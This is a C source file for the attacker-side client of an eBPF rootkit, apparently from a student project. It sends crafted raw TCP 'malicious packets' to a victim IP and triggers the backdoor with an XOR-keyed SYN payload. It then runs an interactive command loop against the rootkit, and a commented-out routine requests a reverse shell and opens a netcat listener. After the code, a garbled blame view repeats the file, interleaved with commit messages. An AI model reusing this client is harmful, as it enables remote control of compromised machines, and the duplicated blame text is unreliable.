src/client/client.c

#include "lib/RawTCP.h"
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <time.h>

#include "../common/constants.h"
#include "../common/c&c.h"
#include "../common/protocol.h"

// For printing with colors
#define KGRN  "\x1B[32m"
#define KYLW  "\x1B[33m"
#define KBLU  "\x1B[34m"
#define KMGN  "\x1B[35m"
#define KRED  "\x1B[31m" 
#define RESET "\x1B[0m"


void print_welcome_message(){
    printf("*******************************************************\n");
    printf("************************* TFG *************************\n");
    printf("*******************************************************\n");
    printf("************ https://github.com/h3xduck/TFG ***********\n");
    printf("*******************************************************\n");
}

void print_help_dialog(const char* arg){
    printf("\nUsage: %s OPTION victim_IP\n\n", arg);
    printf("Program OPTIONs\n");
    char* line = "-S IP";
    char* desc = "Send a secret message to IP";
    printf("\t%-40s %-50s\n\n", line, desc);
    line = "-c IP";
    desc = "Activate direct command & control shell with IP";
    printf("\t%-40s %-50s\n\n", line, desc);
    line = "-h";
    desc = "Print this help";
    printf("\t%-40s %-50s\n\n", line, desc);

}

void check_ip_address_format(char* address){
    char* buf[256];
    int s = inet_pton(AF_INET, address, buf);
    if(s<0){
        printf("["KYLW"WARN"RESET"]""Error checking IP validity\n");
    }else if(s==0){
        printf("["KYLW"WARN"RESET"]""The victim IP is probably not valid\n");
    }
}

char* getLocalIpAddress(){
    char hostbuffer[256];
    char* IPbuffer = calloc(256, sizeof(char));
    struct hostent *host_entry;
    int hostname;
  
    hostname = gethostname(hostbuffer, sizeof(hostbuffer));
    if(hostname==-1){
        perror("["KRED"ERROR"RESET"]""Error getting local IP: gethostname");
        exit(1);
    }
  
    host_entry = gethostbyname(hostbuffer);
    if(host_entry == NULL){
        perror("["KRED"ERROR"RESET"]""Error getting local IP: gethostbyname");
        exit(1);
    }
  
    // To convert an Internet network
    // address into ASCII string
    strcpy(IPbuffer,inet_ntoa(*((struct in_addr*) host_entry->h_addr_list[0])));
  
    printf("["KBLU"INFO"RESET"]""Attacker IP selected: %s\n", IPbuffer);
  
    return IPbuffer;
}


/*void get_shell(char* argv){
    char* local_ip = getLocalIpAddress();
    printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
    check_ip_address_format(argv);
    packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, "UMBRA_PAYLOAD_GET_REVERSE_SHELL");
    printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");

    pid_t pid;
    pid = fork();
    if(pid < 0){
        perror("["KRED"ERROR"RESET"]""Could not create another process");
	    return;
	}else if(pid==0){
        sleep(1);
        //Sending the malicious payload
        if(rawsocket_send(packet)<0){
            printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
        }else{
            printf("["KGRN"OK"RESET"]""Payload successfully sent!\n");
        }
        
    }else {
        //Activating listener
        char *cmd = "nc";
        char *argv[4];
        argv[0] = "nc";
        argv[1] = "-lvp";
        argv[2] = "5888";
        argv[3] = NULL;

        printf("["KBLU"INFO"RESET"]""Trying to get a shell...\n");
        if(execvp(cmd, argv)<0){
            perror("["KRED"ERROR"RESET"]""Error executing background listener");
            return;
        }
        printf("["KGRN"OK"RESET"]""Got a shell\n");
    }
    
    free(local_ip);
}*/

void send_secret_packet(char* argv){
    //TODO revise this, in wireshark it is seen not to be a TCP packet??????
    //Should be working, it did in other projects
    char* local_ip = getLocalIpAddress();
    printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
    check_ip_address_format(argv);
    packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, SECRET_PACKET_PAYLOAD);
    printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
    //Sending the malicious payload
    if(rawsocket_send(packet)<0){
        printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
    }else{
        printf("["KGRN"OK"RESET"]""Secret message successfully sent!\n");
    }
    free(local_ip);
}

void activate_command_control_shell(char* argv){
    char* local_ip = getLocalIpAddress();
    printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
    check_ip_address_format(argv);
    packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, CC_PROT_SYN);
    printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
    //Sending the malicious payload
    if(rawsocket_send(packet)<0){
        printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
        return;
    }else{
        printf("["KGRN"OK"RESET"]""Secret message successfully sent!\n");
    }
    printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n");
    
    //Wait for rootkit ACK to ensure it's up
    rawsocket_sniff_pattern(CC_PROT_ACK);
    printf("["KGRN"OK"RESET"]""Success, received ACK from backdoor\n");   

    //Received ACK, we proceed to send command
    while(1){
        char buf[BUFSIZ];                                                                                                                                                          
        printf(""KYLW"c>:"RESET"");                                                                                                                                                              
        fgets(buf, BUFSIZ, stdin);
        if ((strlen(buf)>0) && (buf[strlen(buf)-1] == '\n')){
            buf[strlen(buf)-1] = '\0';   
        }                                                                                                                                                                         
        
        char msg[BUFSIZ];
        strcpy(msg, CC_PROT_MSG);
        strcat(msg, buf);
        packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, msg);
        printf("Sending %s\n", msg);
        if(rawsocket_send(packet)<0){
            printf("["KRED"ERROR"RESET"]""An error occured. Aborting...\n");
            return;
        }
        printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n");
        packet = rawsocket_sniff_pattern(CC_PROT_MSG);
        char* res = packet.payload;
        printf("["KGRN"RESPONSE"RESET"] %s\n", res);   
    }
    
    free(local_ip);
}

void activate_command_control_shell_encrypted(char* argv){
    char* local_ip = getLocalIpAddress();
    printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);
    check_ip_address_format(argv);
    printf("["KBLU"INFO"RESET"]""Crafting malicious SYN packet...\n");
    //+1 since payload must finish with null character for parameter passing, although not sent in the actual packet payload
    char payload[CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE+1];
    srand(time(NULL));
    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE; ii++){
        payload[ii] = (char)rand();
    }
    //Follow protocol rules
    char section[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
    char section2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
    char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_1;
    char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_2;
    char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_3;
    char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
    strncpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
        result[ii] = section[ii] ^ key1[ii];
    }
    strncpy(payload+0x06, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);

    strncpy(section, payload+0x02, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
        result[ii] = section[ii] ^ key2[ii];
    }
    strncpy(payload+0x0A, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);

    strncpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
    strncpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
    for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
        result[ii] = section[ii] ^ section2[ii] ^ key2[ii];
    }

    strncpy(payload+0x0C, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
    
    
    packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, payload);
    printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");
    //Sending the malicious payload
    if(rawsocket_send(packet)<0){
        printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");
        return;
    }else{
        printf("["KGRN"OK"RESET"]""Secret message successfully sent!\n");
    }
    printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n");
    
    //Wait for rootkit ACK to ensure it's up
    rawsocket_sniff_pattern(CC_PROT_ACK);
    printf("["KGRN"OK"RESET"]""Success, received ACK from backdoor\n");   

    //Received ACK, we proceed to send command
    while(1){
        char buf[BUFSIZ];                                                                                                                                                          
        printf(""KYLW"c>:"RESET"");                                                                                                                                                              
        fgets(buf, BUFSIZ, stdin);
        if ((strlen(buf)>0) && (buf[strlen(buf)-1] == '\n')){
            buf[strlen(buf)-1] = '\0';   
        }                                                                                                                                                                         
        
        char msg[BUFSIZ];
        strcpy(msg, CC_PROT_MSG);
        strcat(msg, buf);
        packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, msg);
        printf("Sending %s\n", msg);
        if(rawsocket_send(packet)<0){
            printf("["KRED"ERROR"RESET"]""An error occured. Aborting...\n");
            return;
        }
        printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n");
        packet = rawsocket_sniff_pattern(CC_PROT_MSG);
        char* res = packet.payload;
        printf("["KGRN"RESPONSE"RESET"] %s\n", res);   
    }
    
}


void main(int argc, char* argv[]){
    if(argc<2){
        printf("["KRED"ERROR"RESET"]""Invalid number of arguments\n");
        print_help_dialog(argv[0]);
        return;
    }

    int ENCRYPT_MODE_SEL = 0;
    int DECRYPT_MODE_SEL = 0;
    int PATH_ARG_PROVIDED = 0;

    int PARAM_MODULE_ACTIVATED = 0;
    
    int opt;
    char dest_address[32];
    char path_arg[512];

    //Command line argument parsing
    while ((opt = getopt(argc, argv, ":S:c:e:h")) != -1) {
        switch (opt) {
        case 'S':
            print_welcome_message();
            sleep(1);
            //Send a secret message
            printf("["KBLU"INFO"RESET"]""Activated SEND a SECRET mode\n");
            //printf("Option S has argument %s\n", optarg);
            strcpy(dest_address, optarg);
            send_secret_packet(dest_address);
            PARAM_MODULE_ACTIVATED = 1;
            
            break;
        case 'c':
            print_welcome_message();
            sleep(1);
            //Send a secret message
            printf("["KBLU"INFO"RESET"]""Activated COMMAND & CONTROL shell\n");
            //printf("Option S has argument %s\n", optarg);
            strcpy(dest_address, optarg);
            activate_command_control_shell(dest_address);
            PARAM_MODULE_ACTIVATED = 1;
            
            break;
        case 'e':
            print_welcome_message();
            sleep(1);
            //Send a secret message
            printf("["KBLU"INFO"RESET"]""Activated COMMAND & CONTROL encrypted shell\n");
            //printf("Option S has argument %s\n", optarg);
            strcpy(dest_address, optarg);
            activate_command_control_shell_encrypted(dest_address);
            PARAM_MODULE_ACTIVATED = 1;
            
            break;
        /*case 'u': 
            print_welcome_message();
            sleep(1);
            //Selecting show rootkit - Unhide mode
            printf("["KBLU"INFO"RESET"]""Selected UNHIDE the rootkit remotely\n");
            //printf("Option m has argument %s\n", optarg);
            strcpy(dest_address, optarg);
            show_rootkit(dest_address);
            PARAM_MODULE_ACTIVATED = 1;

            break;
        case 'i': 
            print_welcome_message();
            sleep(1);
            //Selecting hide rootkit - Invisible mode
            printf("["KBLU"INFO"RESET"]""Selected HIDE the rootkit remotely\n");
            //printf("Option m has argument %s\n", optarg);
            strcpy(dest_address, optarg);
            hide_rootkit(dest_address);
            PARAM_MODULE_ACTIVATED = 1;
        
        case 'e': 
            ENCRYPT_MODE_SEL = 1;
            strcpy(dest_address, optarg);

            break;
        case 'd':
            DECRYPT_MODE_SEL = 1;
            strcpy(dest_address, optarg);
            break;

        case 'p':
            PATH_ARG_PROVIDED = 1;
            strcpy(path_arg, optarg);
            break;*/

        case 'h':
            print_help_dialog(argv[0]);
            exit(0);
            break;
        case '?':
            printf("["KRED"ERROR"RESET"]""Unknown option: %c\n", optopt);
            break;
        case ':':
            printf("["KRED"ERROR"RESET"]""Missing arguments for %c\n", optopt);
            exit(EXIT_FAILURE);
            break;
        
        default:
            print_help_dialog(argv[0]);
            exit(EXIT_FAILURE);
        }
    }

    if(PARAM_MODULE_ACTIVATED==0){
        printf("["KRED"ERROR"RESET"]""Invalid parameters\n");
        print_help_dialog(argv[0]);
        exit(EXIT_FAILURE);
    }
   
}
Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client 2021-11-22 18:58:58 -05:00			`#include "lib/RawTCP.h"`
			`#include <stdio.h>`
			`#include <unistd.h>`
			`#include <string.h>`
			`#include <sys/types.h>`
			`#include <sys/socket.h>`
			`#include <netinet/in.h>`
			`#include <arpa/inet.h>`
			`#include <netdb.h>`
			`#include <stdlib.h>`
Completed client payload generation 2022-04-14 09:49:08 -04:00			`#include <time.h>`
Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client 2021-11-22 18:58:58 -05:00
Added more communication utils between userspace and kernel: * Included maps and kernel ring buffer communication * Extended the ebpf structure to include more modules * New utils in both user and kernelspace * Other changes * This update precedes a great effort on researching and learning and linux kernel tracing and studing ebpfkit from defcon. More functionalities should come rather quickly now. 2021-12-29 14:44:09 -05:00			`#include "../common/constants.h"`
Completed client integration with new c&c module. 2022-02-17 06:21:09 -05:00			`#include "../common/c&c.h"`
Included new version of custom lib. Added checks for backdoor triggering 2022-05-04 04:40:25 -04:00			`#include "../common/protocol.h"`
Finished adapting the client. Cleaned the user code and added getopt. The filter fully works now. Next step: return data to userspace via a map. 2021-11-22 20:02:47 -05:00
Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client 2021-11-22 18:58:58 -05:00			`// For printing with colors`
			`#define KGRN "\x1B[32m"`
			`#define KYLW "\x1B[33m"`
			`#define KBLU "\x1B[34m"`
			`#define KMGN "\x1B[35m"`
			`#define KRED "\x1B[31m"`
			`#define RESET "\x1B[0m"`

Completed client payload generation 2022-04-14 09:49:08 -04:00
Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client 2021-11-22 18:58:58 -05:00			`void print_welcome_message(){`
			`printf("*******************************************************\n");`
			`printf("*********************** TFG ***********************\n");`
			`printf("*******************************************************\n");`
			`printf("********** https://github.com/h3xduck/TFG *********\n");`
			`printf("*******************************************************\n");`
			`}`

			`void print_help_dialog(const char* arg){`
			`printf("\nUsage: %s OPTION victim_IP\n\n", arg);`
			`printf("Program OPTIONs\n");`
Completed client integration with new c&c module. 2022-02-17 06:21:09 -05:00			`char* line = "-S IP";`
Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client 2021-11-22 18:58:58 -05:00			`char* desc = "Send a secret message to IP";`
			`printf("\t%-40s %-50s\n\n", line, desc);`
Completed client integration with new c&c module. 2022-02-17 06:21:09 -05:00			`line = "-c IP";`
			`desc = "Activate direct command & control shell with IP";`
			`printf("\t%-40s %-50s\n\n", line, desc);`
Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client 2021-11-22 18:58:58 -05:00			`line = "-h";`
			`desc = "Print this help";`
			`printf("\t%-40s %-50s\n\n", line, desc);`

			`}`

			`void check_ip_address_format(char* address){`
			`char* buf[256];`
			`int s = inet_pton(AF_INET, address, buf);`
			`if(s<0){`
			`printf("["KYLW"WARN"RESET"]""Error checking IP validity\n");`
			`}else if(s==0){`
			`printf("["KYLW"WARN"RESET"]""The victim IP is probably not valid\n");`
			`}`
			`}`

			`char* getLocalIpAddress(){`
			`char hostbuffer[256];`
			`char* IPbuffer = calloc(256, sizeof(char));`
			`struct hostent *host_entry;`
			`int hostname;`

			`hostname = gethostname(hostbuffer, sizeof(hostbuffer));`
			`if(hostname==-1){`
			`perror("["KRED"ERROR"RESET"]""Error getting local IP: gethostname");`
			`exit(1);`
			`}`

			`host_entry = gethostbyname(hostbuffer);`
			`if(host_entry == NULL){`
			`perror("["KRED"ERROR"RESET"]""Error getting local IP: gethostbyname");`
			`exit(1);`
			`}`

			`// To convert an Internet network`
			`// address into ASCII string`
			`strcpy(IPbuffer,inet_ntoa(((struct in_addr) host_entry->h_addr_list[0])));`

			`printf("["KBLU"INFO"RESET"]""Attacker IP selected: %s\n", IPbuffer);`

			`return IPbuffer;`
			`}`


Finished adapting the client. Cleaned the user code and added getopt. The filter fully works now. Next step: return data to userspace via a map. 2021-11-22 20:02:47 -05:00			`/void get_shell(char argv){`
Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client 2021-11-22 18:58:58 -05:00			`char* local_ip = getLocalIpAddress();`
			`printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);`
			`check_ip_address_format(argv);`
			`packet_t packet = build_standard_packet(9000, 9000, local_ip, argv, 2048, "UMBRA_PAYLOAD_GET_REVERSE_SHELL");`
			`printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");`

			`pid_t pid;`
			`pid = fork();`
			`if(pid < 0){`
			`perror("["KRED"ERROR"RESET"]""Could not create another process");`
			`return;`
			`}else if(pid==0){`
			`sleep(1);`
			`//Sending the malicious payload`
			`if(rawsocket_send(packet)<0){`
			`printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");`
			`}else{`
			`printf("["KGRN"OK"RESET"]""Payload successfully sent!\n");`
			`}`

			`}else {`
			`//Activating listener`
			`char *cmd = "nc";`
			`char *argv[4];`
			`argv[0] = "nc";`
			`argv[1] = "-lvp";`
			`argv[2] = "5888";`
			`argv[3] = NULL;`

			`printf("["KBLU"INFO"RESET"]""Trying to get a shell...\n");`
			`if(execvp(cmd, argv)<0){`
			`perror("["KRED"ERROR"RESET"]""Error executing background listener");`
			`return;`
			`}`
			`printf("["KGRN"OK"RESET"]""Got a shell\n");`
			`}`

			`free(local_ip);`
Finished adapting the client. Cleaned the user code and added getopt. The filter fully works now. Next step: return data to userspace via a map. 2021-11-22 20:02:47 -05:00			`}*/`
Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client 2021-11-22 18:58:58 -05:00
Finished adapting the client. Cleaned the user code and added getopt. The filter fully works now. Next step: return data to userspace via a map. 2021-11-22 20:02:47 -05:00			`void send_secret_packet(char* argv){`
Finished adapting the code to tcp packets (+ researched a lot about xdp and ebpf, we should be OK with xdps, found a lot of ideas) 2021-11-23 19:55:44 -05:00			`//TODO revise this, in wireshark it is seen not to be a TCP packet??????`
			`//Should be working, it did in other projects`
Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client 2021-11-22 18:58:58 -05:00			`char* local_ip = getLocalIpAddress();`
			`printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);`
			`check_ip_address_format(argv);`
Fixed the client, now the payload shrinking is fully working, also the bug previously found seems to be nothing but an error of mine. Ready to merge! 2021-11-27 19:08:38 -05:00			`packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, SECRET_PACKET_PAYLOAD);`
Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client 2021-11-22 18:58:58 -05:00			`printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");`
			`//Sending the malicious payload`
			`if(rawsocket_send(packet)<0){`
			`printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");`
			`}else{`
Fixed the client, now the payload shrinking is fully working, also the bug previously found seems to be nothing but an error of mine. Ready to merge! 2021-11-27 19:08:38 -05:00			`printf("["KGRN"OK"RESET"]""Secret message successfully sent!\n");`
Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client 2021-11-22 18:58:58 -05:00			`}`
			`free(local_ip);`
			`}`

Completed client integration with new c&c module. 2022-02-17 06:21:09 -05:00			`void activate_command_control_shell(char* argv){`
			`char* local_ip = getLocalIpAddress();`
			`printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);`
			`check_ip_address_format(argv);`
			`packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, CC_PROT_SYN);`
			`printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");`
			`//Sending the malicious payload`
			`if(rawsocket_send(packet)<0){`
			`printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");`
			`return;`
			`}else{`
			`printf("["KGRN"OK"RESET"]""Secret message successfully sent!\n");`
			`}`
			`printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n");`

			`//Wait for rootkit ACK to ensure it's up`
			`rawsocket_sniff_pattern(CC_PROT_ACK);`
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00			`printf("["KGRN"OK"RESET"]""Success, received ACK from backdoor\n");`
Completed client integration with new c&c module. 2022-02-17 06:21:09 -05:00
			`//Received ACK, we proceed to send command`
			`while(1){`
			`char buf[BUFSIZ];`
			`printf(""KYLW"c>:"RESET"");`
Completed execution of arbitrary commands sent from the backdoor client 2022-02-18 04:06:18 -05:00			`fgets(buf, BUFSIZ, stdin);`
			`if ((strlen(buf)>0) && (buf[strlen(buf)-1] == '\n')){`
			`buf[strlen(buf)-1] = '\0';`
			`}`
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00
Completed client integration with new c&c module. 2022-02-17 06:21:09 -05:00			`char msg[BUFSIZ];`
			`strcpy(msg, CC_PROT_MSG);`
			`strcat(msg, buf);`
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00			`packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, msg);`
Completed client integration with new c&c module. 2022-02-17 06:21:09 -05:00			`printf("Sending %s\n", msg);`
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00			`if(rawsocket_send(packet)<0){`
			`printf("["KRED"ERROR"RESET"]""An error occured. Aborting...\n");`
			`return;`
			`}`
			`printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n");`
			`packet = rawsocket_sniff_pattern(CC_PROT_MSG);`
Completed client integration with new c&c module. 2022-02-17 06:21:09 -05:00			`char* res = packet.payload;`
Finished pseudo-connection between client and rootkit backdoor. Updated library to latest version. 2022-02-18 03:32:07 -05:00			`printf("["KGRN"RESPONSE"RESET"] %s\n", res);`
Completed client integration with new c&c module. 2022-02-17 06:21:09 -05:00			`}`

			`free(local_ip);`
			`}`

Completed client payload generation 2022-04-14 09:49:08 -04:00			`void activate_command_control_shell_encrypted(char* argv){`
			`char* local_ip = getLocalIpAddress();`
			`printf("["KBLU"INFO"RESET"]""Victim IP selected: %s\n", argv);`
			`check_ip_address_format(argv);`
			`printf("["KBLU"INFO"RESET"]""Crafting malicious SYN packet...\n");`
Included new version of custom lib. Added checks for backdoor triggering 2022-05-04 04:40:25 -04:00			`//+1 since payload must finish with null character for parameter passing, although not sent in the actual packet payload`
			`char payload[CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE+1];`
Completed client payload generation 2022-04-14 09:49:08 -04:00			`srand(time(NULL));`
Included new version of custom lib. Added checks for backdoor triggering 2022-05-04 04:40:25 -04:00			`for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE; ii++){`
Added locking mechanism for execve_hijack. Incorporated new library rawtcp with latest version without bug. 2022-04-14 13:24:43 -04:00			`payload[ii] = (char)rand();`
Completed client payload generation 2022-04-14 09:49:08 -04:00			`}`
			`//Follow protocol rules`
Included new version of custom lib. Added checks for backdoor triggering 2022-05-04 04:40:25 -04:00			`char section[CC_TRIGGER_SYN_PACKET_SECTION_LEN];`
			`char section2[CC_TRIGGER_SYN_PACKET_SECTION_LEN];`
			`char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_1;`
			`char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_2;`
			`char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_3;`
			`char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];`
			`strncpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);`
			`for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){`
Completed client payload generation 2022-04-14 09:49:08 -04:00			`result[ii] = section[ii] ^ key1[ii];`
			`}`
Included new version of custom lib. Added checks for backdoor triggering 2022-05-04 04:40:25 -04:00			`strncpy(payload+0x06, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);`
Completed client payload generation 2022-04-14 09:49:08 -04:00
Included new version of custom lib. Added checks for backdoor triggering 2022-05-04 04:40:25 -04:00			`strncpy(section, payload+0x02, CC_TRIGGER_SYN_PACKET_SECTION_LEN);`
			`for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){`
Completed client payload generation 2022-04-14 09:49:08 -04:00			`result[ii] = section[ii] ^ key2[ii];`
			`}`
Included new version of custom lib. Added checks for backdoor triggering 2022-05-04 04:40:25 -04:00			`strncpy(payload+0x0A, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);`
Completed client payload generation 2022-04-14 09:49:08 -04:00
Included new version of custom lib. Added checks for backdoor triggering 2022-05-04 04:40:25 -04:00			`strncpy(section, payload+0x06, CC_TRIGGER_SYN_PACKET_SECTION_LEN);`
			`strncpy(section2, payload+0x0A, CC_TRIGGER_SYN_PACKET_SECTION_LEN);`
			`for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){`
Completed client payload generation 2022-04-14 09:49:08 -04:00			`result[ii] = section[ii] ^ section2[ii] ^ key2[ii];`
			`}`

Included new version of custom lib. Added checks for backdoor triggering 2022-05-04 04:40:25 -04:00			`strncpy(payload+0x0C, result, CC_TRIGGER_SYN_PACKET_SECTION_LEN);`
Completed client payload generation 2022-04-14 09:49:08 -04:00

Added locking mechanism for execve_hijack. Incorporated new library rawtcp with latest version without bug. 2022-04-14 13:24:43 -04:00			`packet_t packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, payload);`
Completed client payload generation 2022-04-14 09:49:08 -04:00			`printf("["KBLU"INFO"RESET"]""Sending malicious packet to infected machine...\n");`
			`//Sending the malicious payload`
			`if(rawsocket_send(packet)<0){`
			`printf("["KRED"ERROR"RESET"]""An error occured. Is the machine up?\n");`
			`return;`
			`}else{`
			`printf("["KGRN"OK"RESET"]""Secret message successfully sent!\n");`
			`}`
			`printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n");`

			`//Wait for rootkit ACK to ensure it's up`
			`rawsocket_sniff_pattern(CC_PROT_ACK);`
			`printf("["KGRN"OK"RESET"]""Success, received ACK from backdoor\n");`

			`//Received ACK, we proceed to send command`
			`while(1){`
			`char buf[BUFSIZ];`
			`printf(""KYLW"c>:"RESET"");`
			`fgets(buf, BUFSIZ, stdin);`
			`if ((strlen(buf)>0) && (buf[strlen(buf)-1] == '\n')){`
			`buf[strlen(buf)-1] = '\0';`
			`}`

			`char msg[BUFSIZ];`
			`strcpy(msg, CC_PROT_MSG);`
			`strcat(msg, buf);`
			`packet = build_standard_packet(8000, 9000, local_ip, argv, 4096, msg);`
			`printf("Sending %s\n", msg);`
			`if(rawsocket_send(packet)<0){`
			`printf("["KRED"ERROR"RESET"]""An error occured. Aborting...\n");`
			`return;`
			`}`
			`printf("["KBLU"INFO"RESET"]""Waiting for rootkit response...\n");`
			`packet = rawsocket_sniff_pattern(CC_PROT_MSG);`
			`char* res = packet.payload;`
			`printf("["KGRN"RESPONSE"RESET"] %s\n", res);`
			`}`

			`}`

Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client 2021-11-22 18:58:58 -05:00
			`void main(int argc, char* argv[]){`
			`if(argc<2){`
			`printf("["KRED"ERROR"RESET"]""Invalid number of arguments\n");`
			`print_help_dialog(argv[0]);`
			`return;`
			`}`

			`int ENCRYPT_MODE_SEL = 0;`
			`int DECRYPT_MODE_SEL = 0;`
			`int PATH_ARG_PROVIDED = 0;`

			`int PARAM_MODULE_ACTIVATED = 0;`

			`int opt;`
			`char dest_address[32];`
			`char path_arg[512];`

			`//Command line argument parsing`
Added locking mechanism for execve_hijack. Incorporated new library rawtcp with latest version without bug. 2022-04-14 13:24:43 -04:00			`while ((opt = getopt(argc, argv, ":S:c:e:h")) != -1) {`
Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client 2021-11-22 18:58:58 -05:00			`switch (opt) {`
			`case 'S':`
			`print_welcome_message();`
			`sleep(1);`
			`//Send a secret message`
			`printf("["KBLU"INFO"RESET"]""Activated SEND a SECRET mode\n");`
			`//printf("Option S has argument %s\n", optarg);`
			`strcpy(dest_address, optarg);`
Finished adapting the client. Cleaned the user code and added getopt. The filter fully works now. Next step: return data to userspace via a map. 2021-11-22 20:02:47 -05:00			`send_secret_packet(dest_address);`
Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client 2021-11-22 18:58:58 -05:00			`PARAM_MODULE_ACTIVATED = 1;`

Completed client integration with new c&c module. 2022-02-17 06:21:09 -05:00			`break;`
			`case 'c':`
			`print_welcome_message();`
			`sleep(1);`
			`//Send a secret message`
			`printf("["KBLU"INFO"RESET"]""Activated COMMAND & CONTROL shell\n");`
			`//printf("Option S has argument %s\n", optarg);`
			`strcpy(dest_address, optarg);`
			`activate_command_control_shell(dest_address);`
			`PARAM_MODULE_ACTIVATED = 1;`

Completed client payload generation 2022-04-14 09:49:08 -04:00			`break;`
			`case 'e':`
			`print_welcome_message();`
			`sleep(1);`
			`//Send a secret message`
			`printf("["KBLU"INFO"RESET"]""Activated COMMAND & CONTROL encrypted shell\n");`
			`//printf("Option S has argument %s\n", optarg);`
			`strcpy(dest_address, optarg);`
